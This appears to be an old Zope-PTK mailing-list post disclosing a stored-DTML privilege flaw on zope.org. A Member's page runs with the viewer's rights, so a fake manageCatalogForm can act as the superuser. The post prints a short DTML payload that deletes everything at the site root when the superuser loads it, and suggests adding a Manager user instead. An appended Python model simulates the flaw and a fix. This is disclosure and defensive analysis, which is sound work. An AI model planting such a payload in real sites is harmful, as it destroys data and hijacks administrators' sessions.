[Zope-PTK] Security problems with letting Members use DTML
This is actually more relevant to zope.org, but will eventually be an issue
with PTK, I think.

Consider the following situation on zope.org: I register a News item, ask
for it to be cataloged - then quickly delete the object, replace it with a
folder of the same name. I then put a DTML Method called manageCatalogForm
into it (which'd be called publish in PTK sites).

Now, according to a reply I got to one of my cataloging requests:

> itamar requests that an object be cataloged.
>
> View it:
> http://www.zope.org/Members/itamar/load_site
>
> Catalog it
> http://www.zope.org/Members/itamar/load_site/manageCatalogForm
>
> Make sure to be logged in as superuser to
> perform catalog entry adding.

I know that **superuser** is going to be visiting this DTML Method. So I
just add this to my fake manageCatalogForm:

<dtml-if "AUTHENTICATED_USER.getUserName() == 'superuser'">
<dtml-call "PARENTS[-1].manage_delObjects(PARENTS[-1].objectIds())">
</dtml-if>

or add a Manager user to acl_users or whatever.

In the same way, whenever any other user of Zope.org is logged in and
viewing one of my pages, I can do whatever I want to their Member pages.

The problem here of course is that viewing a page in Zope actually executes
code - the Unix equivalent might be, for example, having '.' as the first
item in PATH.

The obvious solution is disallowing use of DTML. But this is a general
problem in any Zope install where multiple users have write access, such as
hosting services.

--
Itamar S.T. itamars@ibm.net
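Added example (not from the post and not Zope code): a small Python model of the problem described above. A template authored by one user runs when another user views it. Under a "viewer" policy the template acts with the viewer's roles, so the Member-authored page can delete everything once the superuser loads it; under an "owner and viewer" policy it can do no more than its author could, which is the shape of fix the post's last paragraph points toward. All names here (Folder, User, Template, the "Delete objects" permission, the role sets) are hypothetical stand-ins for Zope's objects, and the site layout is constructed.

```python
"""Toy model of a user-authored template running with the viewer's privileges.

Added example, not Zope's code. Folder/User/Template and the permission and
role names are hypothetical stand-ins for Zope's real objects.
"""
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Set, Tuple


class Unauthorized(Exception):
    """Raised when the effective roles lack the required permission."""


@dataclass
class User:
    name: str
    roles: Set[str]


@dataclass
class Folder:
    name: str
    objects: Dict[str, object] = field(default_factory=dict)
    # permission -> roles that hold it (constructed, like a Zope role map)
    permissions: Dict[str, Set[str]] = field(default_factory=dict)

    def check(self, effective_roles: Set[str], permission: str) -> None:
        if not (self.permissions.get(permission, set()) & effective_roles):
            raise Unauthorized(f"{permission} on {self.name}")

    def manage_delObjects(self, effective_roles: Set[str], ids: List[str]) -> None:
        # Guarded the way a real folder would guard deletion.
        self.check(effective_roles, "Delete objects")
        for obj_id in ids:
            del self.objects[obj_id]

    def objectIds(self) -> List[str]:
        return list(self.objects)


@dataclass
class Template:
    owner: User
    body: Callable[[User, Set[str], Folder], None]


def render(tpl: Template, viewer: User, root: Folder, policy: str) -> None:
    """Run a template for a viewer under one of two privilege policies."""
    if policy == "viewer":
        # The flaw in the post: code runs with whoever is looking at it.
        effective = set(viewer.roles)
    elif policy == "owner_and_viewer":
        # Hardened model: never more than the author themselves could do.
        effective = viewer.roles & tpl.owner.roles
    else:
        raise ValueError(policy)
    tpl.body(viewer, effective, root)


def malicious_body(viewer: User, effective: Set[str], root: Folder) -> None:
    # Mirrors the DTML in the post: only fire when the superuser is looking.
    if viewer.name == "superuser":
        root.manage_delObjects(effective, root.objectIds())


def build_site() -> Folder:
    # Constructed site: only Managers may delete from the root.
    root = Folder("root", permissions={"Delete objects": {"Manager"}})
    root.objects = {"Members": Folder("Members"), "Products": Folder("Products")}
    return root


def run(policy: str, viewer_name: str = "superuser") -> Tuple[str, List[str]]:
    """Return (outcome, surviving object ids) after the viewer loads the page."""
    root = build_site()
    users = {
        "itamar": User("itamar", {"Member"}),
        "superuser": User("superuser", {"Manager"}),
    }
    tpl = Template(owner=users["itamar"], body=malicious_body)
    try:
        render(tpl, users[viewer_name], root, policy)
        outcome = "executed"
    except Unauthorized:
        outcome = "denied"
    return outcome, root.objectIds()


if __name__ == "__main__":
    for policy in ("viewer", "owner_and_viewer"):
        print(policy, run(policy))
```

Under the "viewer" policy the superuser's visit wipes the root; under "owner_and_viewer" the same template raises Unauthorized because the Member author never held "Delete objects", and a Member viewing the page triggers nothing at all.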